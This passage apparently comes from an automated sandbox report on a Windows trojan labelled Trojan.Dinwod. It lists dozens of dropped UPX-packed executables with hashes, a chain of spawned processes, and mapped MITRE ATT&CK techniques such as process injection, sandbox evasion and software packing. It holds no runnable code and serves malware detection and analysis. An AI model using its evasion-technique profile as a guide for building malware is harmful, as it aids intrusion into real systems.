"file_available_to_download": true}, {"name": "822088.exe", "file_path": "C:\\822088.exe", "file_size": 342619, "sha256": "764aeac76b6747f9899c7cda1782e1643cb9b2d43aa570cc1cede2c4f5bb7f51", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "66822.exe (PID: 2164)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8266402.exe", "file_path": "C:\\8266402.exe", "file_size": 342327, "sha256": "ad0491475ce0470270032ef3cf9d96e27bb340c3e259cbe38847ef408afcb54c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6408002.exe (PID: 4220)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "82880.exe", "file_path": "C:\\82880.exe", "file_size": 342407, "sha256": "42b52a44d2310cef532d032983697c01e797dedcca4443b26de6d0d21a937113", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "trxpd.exe (PID: 5900)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "828882.exe", "file_path": "C:\\828882.exe", "file_size": 342442, "sha256": "d91ea386326f3a021634f49b30564e0c3a3df00df0bc1866d08fa49da595b9f1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "44882.exe (PID: 2492)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "860486.exe", "file_path": "C:\\860486.exe", "file_size": 342925, "sha256": "7f64dc09df2c996c2ddc42ae09d22a8c8e1c899b3055bfd3ee05bb5ff59e9013", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "860486.exe (PID: 1472)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "86602.exe", "file_path": "C:\\86602.exe", "file_size": 342721, "sha256": "c5c3b6cd9d9b3c819f9be9fbccc8c9692b3db3b46d59221b36b2a79f7e826a05", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "86602.exe (PID: 3512)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "88220.exe", "file_path": "C:\\88220.exe", "file_size": 342531, "sha256": "8d51e7b54c41cc9a09a9bb8f2f976a089acf065b3d59e9ee892f830025d6a432", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22884.exe (PID: 3556)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "88406.exe", "file_path": "C:\\88406.exe", "file_size": 343066, "sha256": "fb800358261f39ce7bcf048939fb183c392631acc9e547d2ee02925f6a0ffda8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "88406.exe (PID: 1524)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8868006.exe", "file_path": "C:\\8868006.exe", "file_size": 342731, "sha256": "5e4e534db7a76e5d71c1747b0638dbce27c7189d4594f0571995683cb8b79049", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "86602.exe (PID: 3512)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bvfpxr.exe", "file_path": "C:\\bvfpxr.exe", "file_size": 342684, "sha256": "fb78c67fc407336f89f8e1b1e0417176254b72b98fce343560bb25cb29fc32e8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bvfpxr.exe (PID: 6132)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dbbpb.exe", "file_path": "C:\\dbbpb.exe", "file_size": 342764, "sha256": "532567d2f5fa6f139c9f2636d8696fa3fa5c63c6001fea3b877cc3d74dae7e27", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dbbpb.exe (PID: 656)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fnhrv.exe", "file_path": "C:\\fnhrv.exe", "file_size": 342780, "sha256": "e66fea01c05c5f3715a9db1dde0f604872a4606a70d5dd3183d578e870ac3967", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dbbpb.exe (PID: 656)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fttbvhn.exe", "file_path": "C:\\fttbvhn.exe", "file_size": 342747, "sha256": "0fb990a2bf76c9b7da4dcda01cd1b91c99c630510d3cb4bbb7842b3a59296f62", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8868006.exe (PID: 3204)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "htbtt.exe", "file_path": "C:\\htbtt.exe", "file_size": 342696, "sha256": "1cd604cb20c19abfd9e03c77300b20206c829d74df8f8c9ce7aceeae4dfab8f5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bvfpxr.exe (PID: 6132)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jdtpf.exe", "file_path": "C:\\jdtpf.exe", "file_size": 342359, "sha256": "9315b954c7d0401602ae5647a3368f0c191efc74bf6a9520252ab2c035011545", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jdtpf.exe (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jxtxllv.exe", "file_path": "C:\\jxtxllv.exe", "file_size": 342797, "sha256": "4136c26ae49a794acd5563dd7b60dff4b29c5335a7e8eaa489ab7cad683f0cc2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jxtxllv.exe (PID: 1424)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ndnvbhn.exe", "file_path": "C:\\ndnvbhn.exe", "file_size": 342887, "sha256": "1acab8103228d49ceadb78cd47b08523eb3b720bcfd6e58e211edd3b965db543", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tlflpxl.exe (PID: 456)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "phtdn.exe", "file_path": "C:\\phtdn.exe", "file_size": 342668, "sha256": "70af9e830b3d39e11b828e26696c7f5c6583645f1a380f76cf724254f07b667a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tvvfv.exe (PID: 2172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pndnt.exe", "file_path": "C:\\pndnt.exe", "file_size": 342215, "sha256": "30c5d75ed0c1324392be262e3699bdb8b6619e0ff9f16a489b9ff9ae674e07ba", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "202828.exe (PID: 5856)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rbbttj.exe", "file_path": "C:\\rbbttj.exe", "file_size": 342234, "sha256": "f5c2a5b09d8c2bc78012b6c3d0a741aa5a259ddbb91040080a65e30229e1df2b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pndnt.exe (PID: 5832)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rddvv.exe", "file_path": "C:\\rddvv.exe", "file_size": 342837, "sha256": "c884a3fe7e030e99f6736023e766f9ccca4300b967a32ccd9872300d1f715ecb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tthvrx.exe (PID: 3164)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rfppdt.exe", "file_path": "C:\\rfppdt.exe", "file_size": 342639, "sha256": "5a823d185a41747108447474e75bdb1f315a67ba7c82fcf73aa1d54fb5cc0980", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rfppdt.exe (PID: 2160)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rhhbnrn.exe", "file_path": "C:\\rhhbnrn.exe", "file_size": 342267, "sha256": "bee03c3a33fb41ccf836b8ce173cac95fcc4fd4cf9721abd5729396c9aae817c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rhhbnrn.exe (PID: 4260)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tbhlt.exe", "file_path": "C:\\tbhlt.exe", "file_size": 342378, "sha256": "02c5c485fa348a7d7f3f5b5f33e06c086247d5a659a6127b78599492e3173a8d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jdtpf.exe (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tdthpd.exe", "file_path": "C:\\tdthpd.exe", "file_size": 342252, "sha256": "5739d135e5fb88674560caf07c5e186ddb1252f81b2e0098cc417d54df4da971", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tdthpd.exe (PID: 5932)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tlflpxl.exe", "file_path": "C:\\tlflpxl.exe", "file_size": 342868, "sha256": "80fd9f42200a9ea0e0caa297f6aa7fda911f9573cc1d2eda92122503471680d5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tlflpxl.exe (PID: 456)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "trtdln.exe", "file_path": "C:\\trtdln.exe", "file_size": 342340, "sha256": "d459612e3745aeda845982f74e4a6666853714af2fc9cd18d72c8d6d69c02ce6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "trtdln.exe (PID: 5924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "trxpd.exe", "file_path": "C:\\trxpd.exe", "file_size": 342391, "sha256": "0a4d599b0ed911d8b5f46639c04862b1b8dc166987d0d59d7cf6f1fde664f9af", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "trxpd.exe (PID: 5900)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tthvrx.exe", "file_path": "C:\\tthvrx.exe", "file_size": 342823, "sha256": "ef014020ba2ccfbf4917c6d6c6d9ccf46737c7a5f166d7c4eac563475bbd8c45", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xpxpjbf.exe (PID: 3816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tvvfv.exe", "file_path": "C:\\tvvfv.exe", "file_size": 342650, "sha256": "3d8bc87f823b3e992852d2b0eea9f6985ae7bd48179ff6e69131bd3425567827", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tvvfv.exe (PID: 2172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "txphbj.exe", "file_path": "C:\\txphbj.exe", "file_size": 342278, "sha256": "54cc4efa81473dbcb19c7731ef3f0165aca265dca9613e7a41f235d16101c644", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "txphbj.exe (PID: 4160)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vjtpp.exe", "file_path": "C:\\vjtpp.exe", "file_size": 342855, "sha256": "5c1759db20335e306561a45814606ea37e2a4f82beca69a947ee8dc3aa48eeba", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rddvv.exe (PID: 848)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xpxpjbf.exe", "file_path": "C:\\xpxpjbf.exe", "file_size": 342809, "sha256": "093cdf87af714b2dbcdef814c32894b3f5e29146ca8414c9488793a71f4ea720", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jxtxllv.exe (PID: 1424)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xvpdt.exe", "file_size": 343344, "sha256": "456a0d3d771df6894183db60a241eac436fc67020afc3a0ab8781afcffa65f26", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hbpvtv.exe", "file_size": 343332, "sha256": "109fc1687ff4fab21691b33366f815f25dd4b12adc54a9098e9f1dfdd3691f0a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hfxhd.exe", "file_size": 343321, "sha256": "0852d60dedfcd01bda0e59059e1087a55ebb94fc917fa282e012a2032603ad8a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vjdjljv.exe", "file_size": 343308, "sha256": "6be81622f4d3315c27e0f782a302a81b1947d3d0689a50d414f05bd964ab2ae5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rffrrb.exe", "file_size": 343296, "sha256": "0e54a6aeee20631bff01383e9bbac472a7e871f5e15064d39181a48472d28801", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nvdfbr.exe", "file_size": 343282, "sha256": "4f3aab881807f66a5322328298016bf116d520d4123002b65feb1ee37f342e23", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "02886.exe", "file_size": 343262, "sha256": "3d5c196f65ef1c157528450b3706d346dac103bb0b7fdd1edeb8491aa558dd1b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2086280.exe", "file_size": 343252, "sha256": "5d63d1b2426ea8413e80c03ad4a16a4e75a12738fc3f22f15d03413a2e6cba7f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "84862.exe", "file_size": 343240, "sha256": "9cf9e6238b4a4ec4b8ec3190488267478752702cc3a969d80031d2ffa71dec30", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xppdbt.exe", "file_size": 343222, "sha256": "6914fcbd2703b0dd1162c1e3dcb629e9e5e7c5bcfdbe66a75d8cc6fc10e443b7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0082442.exe", "file_size": 343211, "sha256": "5e6e583218e0a3f13a15ac704bc7dfc96e65dbc4c32447a183e17e5301f29654", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hvtvd.exe", "file_size": 343198, "sha256": "f99020052042c65346ff5149d080ed2c4e3e0c2f79c8e314528a28f53c27b4f4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "djlrn.exe", "file_size": 343182, "sha256": "1ec3a6107d1e397af2c85b96a24879e741f9d24dd8d305c66b228f3e7059c9df", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "86488.exe", "file_size": 343165, "sha256": "f5ee17cb86b5c5e9e51d9b45545b01185ef26c6563090dd8e2d50c78d7dfa5e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "246648.exe", "file_size": 343148, "sha256": "60ec3ff0cd3c79e168dd3ec33e09855d3790b653a883830ab15de3e294c7bac3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xjnvbp.exe", "file_size": 343129, "sha256": "e496387677cb748a7a39f03e068f14cd6215171dbbf54872bd9b238ece927747", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tjnrdtx.exe", "file_size": 343119, "sha256": "5ed8ea9c1e07c2bde5286cb467e3fecf0c8a22ec5fdd2f46da2ec10081beca6c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2860666.exe", "file_size": 343108, "sha256": "11383634310507a440d081fcbad07c7d47bca4bb114f79c40a8f1d350d3afcc1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005820", "name": "0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe", "normalized_path": "C:\\0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe", "sha256": "0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea", "av_label": "Trojan.Dinwod", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00005996", "parentuid": "00000000-00005820", "name": "2662206.exe", "normalized_path": "c:\\2662206.exe", "sha256": "8ea4e8e58218a5bfc0231892ac40896e716bd50452874e0eeff6bf0754a64241"}, {"uid": "00000000-00005980", "parentuid": "00000000-00005996", "name": "2668286.exe", "normalized_path": "c:\\2668286.exe", "sha256": "9065c124c98bdc859506b64fc4d486764caaa84f728af64d508cd31cf39a7d36"}, {"uid": "00000000-00006096", "parentuid": "00000000-00005980", "name": "22420.exe", "normalized_path": "c:\\22420.exe", "sha256": "33addde1b4cfdeab0313103776d6929a556f464d149882c120671703b269c047"}, {"uid": "00000000-00005856", "parentuid": "00000000-00006096", "name": "202828.exe", "normalized_path": "c:\\202828.exe", "sha256": "b09e7e465b9af314846aa3777e082ad4d86b8bc8da33d0414cd3938c8348ded1"}, {"uid": "00000000-00005832", "parentuid": "00000000-00005856", "name": "pndnt.exe", "normalized_path": "c:\\pndnt.exe", "sha256": "30c5d75ed0c1324392be262e3699bdb8b6619e0ff9f16a489b9ff9ae674e07ba"}, {"uid": "00000000-00004164", "parentuid": "00000000-00005832", "name": "rbbttj.exe", "normalized_path": "c:\\rbbttj.exe", "sha256": "f5c2a5b09d8c2bc78012b6c3d0a741aa5a259ddbb91040080a65e30229e1df2b"}, {"uid": "00000000-00005932", "parentuid": "00000000-00004164", "name": "tdthpd.exe", "normalized_path": "c:\\tdthpd.exe", "sha256": "5739d135e5fb88674560caf07c5e186ddb1252f81b2e0098cc417d54df4da971"}, {"uid": "00000000-00004260", "parentuid": "00000000-00005932", "name": "rhhbnrn.exe", "normalized_path": "c:\\rhhbnrn.exe", "sha256": "bee03c3a33fb41ccf836b8ce173cac95fcc4fd4cf9721abd5729396c9aae817c"}, {"uid": "00000000-00004160", "parentuid": "00000000-00004260", "name": "txphbj.exe", "normalized_path": "c:\\txphbj.exe", "sha256": "54cc4efa81473dbcb19c7731ef3f0165aca265dca9613e7a41f235d16101c644"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": 